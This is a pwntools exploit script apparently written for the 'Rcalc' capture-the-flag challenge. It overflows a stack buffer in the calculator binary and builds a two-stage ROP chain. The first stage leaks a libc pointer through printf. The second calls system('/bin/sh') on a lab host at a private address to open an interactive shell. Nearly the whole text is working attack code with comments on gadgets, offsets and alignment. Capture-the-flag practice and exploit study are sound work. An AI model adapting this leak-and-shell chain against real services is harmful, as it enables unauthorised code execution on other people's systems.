
adworld-Rcalc

ROP

from pwn import *
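context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

# Target selection.  Override the remote with `python3 exp.py HOST=... PORT=...`
# (pwntools `args`).  A local run needs the *same* libc preloaded (see the
# commented process() line); otherwise every offset taken from `libc` below
# is wrong and the second stage just crashes.
HOST = args.HOST or '10.10.31.156'
PORT = int(args.PORT or 10002)
# cn = process(["/glibc/2.23/64/lib/ld-2.23.so", "./Rcalc"],
#              env={"LD_PRELOAD": "/glibc/2.23/64/lib/libc.so.6"})
cn = remote(HOST, PORT)

elf = ELF('./Rcalc')
# Must be the libc actually running on the target: system() and "/bin/sh"
# are computed from this file, and a mismatch fails silently until the
# shell does not appear.
libc = ELF('./libc6_2.23-0ubuntu11.2_amd64.so')

# The binary is non-PIE, so these are absolute addresses and are only valid
# for this exact build of ./Rcalc.  Re-derive them (ROPgadget / objdump) if
# the binary changes; a stale gadget turns the chain into a plain crash.
libc_start_main_got = elf.got['__libc_start_main']
printf_plt = elf.plt['printf']
main = 0x401036
pop_rdi = 0x401123            # pop rdi ; ret
pop_rsi_r15_ret = 0x401121    # pop rsi ; pop r15 ; ret
fmt_str = 0x401203            # format string inside the binary used for the leak printf
bin_sh_offset = next(libc.search(b"/bin/sh"))

# Bytes written in front of the saved return address: 0x108 of filler, then
# two zero qwords.  The zeros presumably cover the canary slot / saved rbp,
# and the 35 calculator rounds driven by _run_round look like what makes the
# stack check pass — confirm against the binary before reusing this layout.
PADDING = b'a' * 0x108 + p64(0) + p64(0)
ROUNDS = 35


def _run_round(chain):
    """Feed one ROP chain through the calculator UI and trigger the return.

    The chain is written at the 'pls: ' prompt, the menu is then driven
    ROUNDS times (operation 1 with 0/0 operands, keep the result) and
    option 5 leaves main so the overwritten return address is used.

    chain: bytes, a complete stack overwrite (PADDING followed by gadgets).
    """
    cn.sendlineafter(b'pls: ', chain)
    for _ in range(ROUNDS):
        cn.sendlineafter(b'choice:', b'1')
        cn.sendlineafter(b'integer: ', b'0')
        # Second operand.  The original used sendlines('0'), which only worked
        # because iterating a one-character string yields a single line.
        cn.sendline(b'0')
        cn.sendlineafter(b'result? ', b'yes')
    cn.sendlineafter(b'Your choice:', b'5')


cn.recvuntil(b'I')
log.info('main = %#x, __libc_start_main@got = %#x' % (main, libc_start_main_got))

# Stage 1: printf(fmt_str, &__libc_start_main@got) leaks a libc pointer,
# then return to main for a second overflow.  The GOT slot is printf's second
# argument, hence the rsi gadget; r15 receives a throwaway 0 from it.
leak_chain = flat([
    PADDING,
    p64(pop_rdi), p64(fmt_str),
    p64(pop_rsi_r15_ret), p64(libc_start_main_got), p64(0),
    p64(printf_plt),
    p64(main),
])
_run_round(leak_chain)

# A user-space x86-64 pointer (0x7f...) prints as exactly 6 bytes under %s.
# recvn() blocks until all 6 arrive; the original recv(8) returned whatever
# the socket had, so a coalesced packet could hand back the 6 pointer bytes
# plus 2 bytes of the next prompt (or a short read), and the libc base was
# silently wrong.
leak = cn.recvn(6)
libc_start_main = u64(leak.ljust(8, b'\x00'))
libc_base = libc_start_main - libc.symbols['__libc_start_main']
log.info('__libc_start_main = %#x' % libc_start_main)
log.info('libc_base = %#x' % libc_base)
# Cheap plausibility check: a mapping base is page aligned.  Failing here
# (wrong libc file, stray bytes in the leak) is far clearer than a later
# fault inside a bogus system().
if libc_base & 0xfff:
    log.error('libc base %#x is not page aligned - leak or libc file is wrong' % libc_base)

libc_system = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + bin_sh_offset
log.info('system = %#x, "/bin/sh" = %#x' % (libc_system, bin_sh_addr))

# Stage 2: system("/bin/sh").  No extra `ret` for stack alignment is added
# because the original chain worked as-is against this target; if system()
# faults on a movaps, insert a lone `ret` gadget before pop_rdi.
shell_chain = flat([
    PADDING,
    p64(pop_rdi), p64(bin_sh_addr),
    p64(libc_system),
])
_run_round(shell_chain)

cn.interactive()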